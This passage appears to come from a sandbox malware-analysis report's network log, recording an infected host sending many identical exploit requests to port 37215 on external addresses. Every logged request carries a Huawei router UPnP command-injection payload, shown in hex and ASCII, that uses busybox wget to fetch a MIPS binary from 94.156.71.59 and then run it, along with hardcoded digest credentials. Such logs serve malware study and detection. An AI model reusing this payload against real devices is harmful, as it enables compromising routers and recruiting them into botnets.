39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            798192.168.2.1339562156.229.89.18237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.783251047 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            799192.168.2.1339098156.138.11.17137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.784346104 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            800192.168.2.1360856197.82.79.19837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.785255909 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            801192.168.2.1352216156.193.153.4437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.786161900 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            802192.168.2.1356392156.2.80.14137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.787074089 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            803192.168.2.1356284156.174.49.8237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.788816929 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            804192.168.2.135124041.86.51.9637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.789774895 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            805192.168.2.133479241.189.9.13937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.791153908 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            806192.168.2.135125441.54.19.937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.792331934 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            807192.168.2.1344336197.253.198.19537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.793699980 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            808192.168.2.1351590197.197.52.15937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.796621084 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
